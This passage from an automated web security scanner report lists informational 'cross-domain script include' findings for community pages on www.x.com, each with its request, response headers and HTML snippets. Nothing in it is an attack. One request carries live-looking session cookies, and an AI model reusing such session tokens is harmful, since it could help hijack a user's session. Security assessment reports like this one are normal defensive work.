Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134393b31342c323038323b31342c323030353b31342c323134363b31342c323134343b31342c323038363b31342c323134323b31342c323134333b31342c323134353b31342c323034373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=85690 t=1313157080601110
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.52. https://www.x.com/community/ppx/recurring_billing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_billing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/recurring_billing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031373b31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=113300 t=1313157058930963
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.53. https://www.x.com/community/ppx/recurring_payments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_payments

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/recurring_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=126727 t=1313157058403684
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.54. https://www.x.com/community/ppx/release_notes

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/release_notes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/release_notes HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036343b31342c323033323b31342c323033373b31342c323032323b31342c323033303b31342c323032393b31342c323032383b31342c323036333b31342c323032373b31342c323032363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=126133 t=1313157064223215
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.55. https://www.x.com/community/ppx/sdks

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/sdks

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/sdks HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032333b31342c323032343b31342c323036333b31342c323032323b31342c323036343b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:05 GMT; Path=/
Vary: User-Agent
JP: D=250524 t=1313157065371592
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.56. https://www.x.com/community/ppx/showcase

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/showcase HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:55 GMT; Path=/
Vary: User-Agent
JP: D=95160 t=1313156335154548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.57. https://www.x.com/community/ppx/showcase/ap_directory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase/ap_directory

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/showcase/ap_directory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=626237 t=1313157082735465
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.58. https://www.x.com/community/ppx/support

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/support

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/support HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038323b31342c323134323b31342c323134333b31342c323134343b31342c323030353b31342c323134363b31342c323134353b31342c323034373b31342c323034363b31342c323034353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=62142 t=1313157079746964
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.59. https://www.x.com/community/ppx/system_status

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/system_status

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/system_status HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032323b31342c323033303b31342c323033373b31342c323032393b31342c323033323b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=141197 t=1313157063543336
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.60. https://www.x.com/community/ppx/testing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/testing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/testing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033323b31342c323033373b31342c323032393b31342c323033303b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b31342c323031383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=129679 t=1313157063076344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.61. https://www.x.com/community/ppx/training

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/training

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/training HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033343b31342c323032343b31342c323036343b31342c323032353b31342c323032333b31342c323036333b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=90627 t=1313157066413831
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.62. https://www.x.com/community/ppx/transaction_information

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/transaction_information

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/transaction_information HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032363b31342c323032303b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=127710 t=1313157060376316
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.63. https://www.x.com/community/ppx/vt

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/vt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/vt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031353b31342c323031333b31342c323234363b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=134897 t=1313157057107460
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.64. https://www.x.com/community/ppx/website_reporting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/website_reporting

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/website_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033303b31342c323032373b31342c323036333b31342c323032383b31342c323032363b31342c323032393b31342c323032303b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=106773 t=1313157062233186
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.65. https://www.x.com/community/ppx/wpp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/wpp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030393b31342c323030333b31342c323030383b31342c323031343b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=148526 t=1313157033667453
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.66. https://www.x.com/community/ppx/wpphosted

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpphosted

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/wpphosted HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323234363b31342c323031333b31342c323236393b31342c323031353b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=67132 t=1313157057503117
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.67. https://www.x.com/community/ppx/wps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wps

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/wps HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030363b31342c323031333b31342c323236393b31342c323031353b31342c323031363b31342c323234363b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=181388 t=1313157058055328
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
